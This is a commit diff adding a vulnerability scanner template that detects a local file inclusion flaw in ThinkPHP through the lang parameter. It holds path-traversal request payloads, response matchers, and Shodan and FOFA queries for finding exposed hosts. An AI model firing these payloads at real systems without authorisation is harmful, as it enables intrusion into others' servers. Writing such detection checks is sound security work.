Create thinkphp6-lang-lfi.yaml

vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml

@@ -0,0 +1,35 @@
+id: thinkphp6-lang-lfi
+
+info:
+  name: Thinkphp lang - LFI
+  author: kagamigawa
+  severity: high
+  description: |
+    Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to lfi.
+  reference:
+    - https://tttang.com/archive/1865/
+  metadata:
+    verified: true
+    shodan-query: title:"Thinkphp"
+    fofa-query: header="think_lang"
+  tags: thinkphp,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?lang=../../thinkphp/base"
+      - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Call Stack'
+          - 'class="trace'
+        condition: and
+
+      - type: status
+        status:
+          - 500